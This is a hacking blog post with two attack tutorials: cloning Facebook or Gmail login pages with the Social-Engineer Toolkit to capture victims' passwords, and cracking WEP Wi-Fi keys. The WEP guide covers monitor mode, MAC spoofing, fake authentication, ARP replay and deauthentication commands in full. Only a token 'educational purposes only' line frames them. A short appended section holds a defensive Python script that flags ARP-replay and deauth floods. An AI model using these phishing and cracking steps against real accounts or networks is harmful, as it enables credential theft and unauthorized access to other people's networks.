Showing posts with label hacking in backtrack 5. Show all posts

Tuesday, July 31, 2012

Hack Facebook and Gmail using BackTrack 5

I am going to show you how to hack a Facebook account using BackTrack 5. Just follow these simple steps.
Open a terminal in BackTrack 5 and type cd /pentest/exploits/set

Now open the Social-Engineer Toolkit (SET): ./set

Hit ENTER and SET will open. Now select the 1st option (1 Social-Engineering Attacks) and hit ENTER, and after that the 2nd option (just type 2 as shown in the snapshot).

Now select the 4th option, “Tabnabbing Attack Method”, and hit ENTER.

Then select the 2nd option, “Site Cloner”, and hit ENTER.

Now here you need to add the URL of Facebook (if you want to hack Gmail, then just add Gmail’s URL).

Now just hit ENTER.

Open a new terminal, type ifconfig and hit ENTER.

Now just copy this IP address and open it in a browser.

Now here I am just typing a test email and password to see whether it works or not.

Now just hit ENTER and switch back to the terminal, and we have found the email and password!

This tutorial is for educational purposes only.

How to crack WEP with BackTrack 5

1.) Start monitor mode:

airmon-ng

Copy down interface

airmon-ng start (interface)

If it says "mon0" or "wifi0" is used, this is your new interface

If it says other things are running, type "kill (PID#)" for each

2.) Injection test:

aireplay-ng -9 (interface)

The APs that send pings back can be injected

Copy down your target's BSSID, channel & ESSID

aireplay-ng -9 -e (ESSID) -a (BSSID) (interface)

This lets you test specifically, which can be useful for verifying hidden SSIDs or alternative BSSIDs

3.) Target a specific channel:

airmon-ng start (interface) (channel)

4.) Change MAC:

airmon-ng stop (interface(s))

ifconfig (interface) down

macchanger --mac (faked:mac) (interface)

Copy down faked:mac

5.) Begin packet capture:

airodump-ng -c (channel) -w (dump-name) --bssid (BSSID) (new interface)

Keep an eye out for authenticating client’s MACs under Station

If found & step 6 isn’t going well, go back to step 4 and use that MAC

You may have to stop the monitoring interface & the physical one

6.) Fake authentication:

*Put in second shell*

aireplay-ng -1 0 -a (BSSID) -h (faked:mac) (interface)

Successful authentication will continually send keep-alive packets

Using "aireplay-ng -1 6000 -o 1 -q 10 -a (BSSID) -h (faked:mac) (interface)" may help for picky routers

7.) ARP replay:

*Put in third shell*

aireplay-ng -3 -b (BSSID) -h (faked:mac) (interface)

8.) Crack WEP key:

*Put in a fourth shell*

aircrack-ng -b (BSSID) (dump-name)-01.cap

A minimum of around 10,000 to 20,000 IVs is needed to crack a 64-bit key, and about 40,000 to 85,000 for a 128-bit key

Try "aircrack-ng -n 64 (dump-name)*cap" every 10,000 IVs

If you know the start of the key in hexadecimal, try running "-d #" where # is the beginning characters

If key bytes are all numbers, try running with "-t" to assume an all numeric key

Add -x2 to brute force the last 2 bytes

If you reach 2,000,000, try changing the fudge factor to "-f 4" & run 30 minutes to an hour

Retry with the fudge factor increased by 4 more if that’s unsuccessful

If key bytes all start with similar numbers, try running with "-h" to assume an all ASCII key

Add -x if trying with very few IVs to prevent brute forcing the last 2 bytes

* Other attack methods:

Injection attack with 2 wireless cards:

aireplay-ng -9 -i (receiving interface) (injecting interface)

If it fails on Attack -5, make sure the injection interface MAC matches the current card MAC

Deauthentication attack:

aireplay-ng --deauth 5 -a (BSSID) -c (faked:mac) (interface)

Can be faster than an ARP replay, but you must know the MAC of an authenticated client who is online

This will disconnect the authenticated client, so they may get suspicious...
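
Seen from the network owner's side, the ARP replay in step 7 and the deauthentication attack above both show up as one source MAC sending a burst of identical frames. The sketch below is an added example, not part of the original post: it counts frames per source in a sliding window and flags the floods. The record format, frame-type labels, thresholds and MAC addresses are assumptions, and the sample data is constructed.

```python
from collections import defaultdict, deque

# Assumed thresholds (frames per window); tune against a baseline of your network.
LIMITS = {"arp_request": 100, "deauth": 5}
WINDOW = 1.0  # seconds

def detect_floods(frames, limits=LIMITS, window=WINDOW):
    """Flag (frame_type, source_mac, bssid) keys whose rate exceeds the limit.

    frames: time-ordered tuples (timestamp, frame_type, source_mac, bssid),
    an assumed summary format produced by a wireless sensor.
    """
    recent = defaultdict(deque)   # key -> timestamps inside the sliding window
    alerts = set()
    for ts, ftype, src, bssid in frames:
        if ftype not in limits:
            continue
        key = (ftype, src, bssid)
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:   # drop timestamps that left the window
            q.popleft()
        if len(q) > limits[ftype]:
            alerts.add(key)
    return sorted(alerts)

def sample_frames():
    """Constructed records, not a real capture."""
    ap = "00:11:22:33:44:55"
    client, replayer = "aa:aa:aa:aa:aa:01", "aa:aa:aa:aa:aa:02"
    # Ordinary client: one ARP request every two seconds
    frames = [(i * 2.0, "arp_request", client, ap) for i in range(10)]
    frames.append((1.0, "deauth", ap, ap))  # single, ordinary deauth
    # One station repeating ARP requests 500 times per second for two seconds
    frames += [(5.0 + i * 0.002, "arp_request", replayer, ap) for i in range(1000)]
    # Burst of 20 deauth frames carrying the AP's address as source
    frames += [(8.0 + i * 0.02, "deauth", ap, ap) for i in range(20)]
    return sorted(frames)

if __name__ == "__main__":
    for ftype, src, bssid in detect_floods(sample_frames()):
        print(f"ALERT {ftype} flood from {src} on BSSID {bssid}")
```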
